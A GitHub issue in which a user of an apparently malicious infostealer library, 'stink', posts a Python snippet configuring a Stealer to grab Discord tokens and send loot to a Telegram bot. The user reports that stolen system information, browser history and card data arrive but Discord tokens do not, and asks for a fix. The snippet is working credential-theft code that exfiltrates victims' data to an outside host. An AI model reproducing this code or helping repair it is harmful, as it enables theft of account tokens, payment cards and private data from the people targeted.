Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Module discord (collecting tokens) not working. #69

Open
eternalukas opened this issue Oct 28, 2024 · 0 comments
Open

Module discord (collecting tokens) not working. #69

eternalukas opened this issue Oct 28, 2024 · 0 comments

Comments

@eternalukas
Copy link

eternalukas commented Oct 28, 2024

Code:

from stink import Stealer, Features, Senders

if __name__ == '__main__':
    Stealer(
        senders=[
            Senders.telegram(token="7251436322:...", user_id=...)
        ], 
        features=[
            Features.discord
        ]
    ).run()

Im getting the system information in my telegram, but no tokens.
I censored my token bot and my user ID, but its there btw.

All other modules, such as history, cards, etc., work correctly. Except Discord.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant